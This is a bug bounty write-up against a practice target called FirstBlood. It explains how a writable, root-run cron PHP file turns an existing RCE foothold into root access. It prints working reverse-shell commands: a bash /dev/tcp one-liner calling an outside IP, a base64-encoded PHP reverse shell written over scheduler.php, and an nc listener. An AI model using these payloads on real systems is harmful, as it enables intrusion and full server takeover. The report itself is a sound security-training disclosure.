FirstBlood-#692 — Becoming a root on the server
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-27, panya reported:
As I reported in https://www.bugbountyhunter.com/hackevents/report?id=475 the site contains an insecure deserialization vulnerability which leads to RCE.
After I exploited it and popped a reverse shell with this payload:
/bin/bash -c 'bash -i >& /dev/tcp/126.96.36.199/1234 0>&1'
I noticed that the current user is
After navigating through the file system and reading files, I found file
scheduler.phpwith this comment:
/* Tell Raymond on the server team to turn off the crontab until we need it -Patrice */
I checked cron jobs and found this one (in the
* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1
scheduler.phpfile is executed via php by the root user every minute.
fb-execuser can write to this file.
So to become the root of this server, we can write another reverse shell payload to this file:
echo PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= | base64 -d > scheduler.php
PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4=is our base64 encoded php reverse shell code:
<?php system("/bin/bash -c 'bash -i >& /dev/tcp/188.8.131.52/1234 0>&1'"); ?>
And after running
nc -nvlp 1234on my server (
184.108.40.206) and waiting a bit, I got the root shell:
id uid=0(root) gid=0(root) groups=0(root)
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.